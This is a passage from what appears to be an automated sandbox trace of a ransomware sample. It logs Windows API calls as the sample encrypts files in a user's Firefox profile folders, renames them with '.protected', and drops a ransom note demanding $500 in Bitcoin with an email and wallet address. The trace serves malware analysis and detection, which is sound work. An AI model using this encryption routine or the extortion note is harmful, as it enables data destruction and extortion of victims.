lpString2="$Recycle.bin") returned 1 [0086.632] lstrcmpiW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="System Volume Information") returned -1 [0086.632] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png") returned 137 [0086.632] StrStrIW (lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch=".protected") returned 0x0 [0086.633] lstrcmpW (lpString1="ce8c0453589216a67cddb50284fbfe8d.png", lpString2="RESTORE_FILES.txt") returned -1 [0086.633] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.633] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.633] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png") returned 137 [0086.634] StrStrW (lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch=".txt") returned 0x0 [0086.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png") returned 137 [0086.634] StrStrW 
(lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch=".rar") returned 0x0 [0086.634] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png") returned 137 [0086.634] StrStrW (lpFirst="ce8c0453589216a67cddb50284fbfe8d.png", lpSrch=".zip") returned 0x0 [0086.634] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.642] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.642] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0086.642] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.642] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.647] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.647] CloseHandle (hObject=0x158) returned 1 [0086.647] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.protected") returned 147 [0086.647] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ce8c0453589216a67cddb50284fbfe8d.png.protected")) returned 1 [0086.648] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.649] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.649] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\RESTORE_FILES.txt") returned 118 [0086.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.649] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.649] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.650] lstrlenA (lpString="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") returned 684 [0086.650] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.650] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.650] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0086.650] CloseHandle (hObject=0x154) returned 1 [0086.650] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="Windows") returned -1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="Program Files") returned -1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="Program Files (x86)") returned -1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="$Recycle.bin") returned 1 [0086.651] lstrcmpiW (lpString1="_CACHE_CLEAN_", lpString2="System Volume Information") returned -1 [0086.651] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_") returned 103 [0086.651] StrStrIW (lpFirst="_CACHE_CLEAN_", lpSrch=".protected") returned 0x0 [0086.651] lstrcmpW (lpString1="_CACHE_CLEAN_", lpString2="RESTORE_FILES.txt") returned -1 [0086.651] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.651] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.651] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.651] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_") returned 103 [0086.651] StrStrW (lpFirst="_CACHE_CLEAN_", lpSrch=".txt") returned 0x0 [0086.651] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_") returned 103 [0086.651] StrStrW (lpFirst="_CACHE_CLEAN_", lpSrch=".rar") returned 0x0 [0086.651] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_") returned 103 [0086.651] StrStrW (lpFirst="_CACHE_CLEAN_", lpSrch=".zip") returned 0x0 [0086.652] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1, lpOverlapped=0x0) returned 1 [0086.652] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.652] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1, lpOverlapped=0x0) returned 1 [0086.653] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.653] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.653] WriteFile (in: hFile=0x154, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.654] CloseHandle (hObject=0x154) returned 1 [0086.654] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.protected") returned 113 [0086.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_.protected")) returned 1 [0086.655] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.655] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.655] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\RESTORE_FILES.txt") returned 107 [0086.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.656] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.656] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.656] lstrlenA (lpString="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") returned 684 [0086.656] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.657] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.657] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.657] CloseHandle (hObject=0x150) returned 1 [0086.658] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0086.658] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0086.658] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\RESTORE_FILES.txt") returned 90 [0086.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.659] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.659] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0086.660] lstrlenA (lpString="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") returned 684 [0086.660] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.660] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.660] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.660] CloseHandle (hObject=0x14c) returned 1 [0086.661] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.661] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.661] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\RESTORE_FILES.txt") returned 81 [0086.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.662] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.662] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.662] lstrlenA (lpString="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") returned 684 [0086.662] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.663] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.663] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0086.663] CloseHandle (hObject=0xd8) returned 1 [0086.663] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="Windows") returned -1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="Program Files") returned 1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="Program Files (x86)") returned 1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="$Recycle.bin") returned 1 [0086.663] lstrcmpiW (lpString1="updates", lpString2="System Volume Information") returned 1 [0086.663] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates") returned 63 [0086.663] lstrcmpW (lpString1="updates", lpString2=".") returned 1 [0086.663] lstrcmpW (lpString1="updates", lpString2="..") returned 1 [0086.663] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\*") returned 65 [0086.663] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.663] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.663] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.663] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.664] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.664] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.664] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\.") returned 65 [0086.664] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.664] FindNextFileW (in: hFindFile=0x47ba50, 
lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.664] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.664] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.664] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.664] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.664] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.664] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\..") returned 66 [0086.664] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.664] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.664] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="Windows") returned -1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="Program Files") returned -1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="Program Files (x86)") returned -1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="$Recycle.bin") returned 1 [0086.664] lstrcmpiW (lpString1="E7CF176E110C211B", lpString2="System Volume Information") returned -1 [0086.664] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B") returned 80 [0086.664] lstrcmpW (lpString1="E7CF176E110C211B", lpString2=".") returned 1 [0086.664] lstrcmpW (lpString1="E7CF176E110C211B", lpString2="..") returned 1 [0086.664] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\updates\\E7CF176E110C211B\\*") returned 82 [0086.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
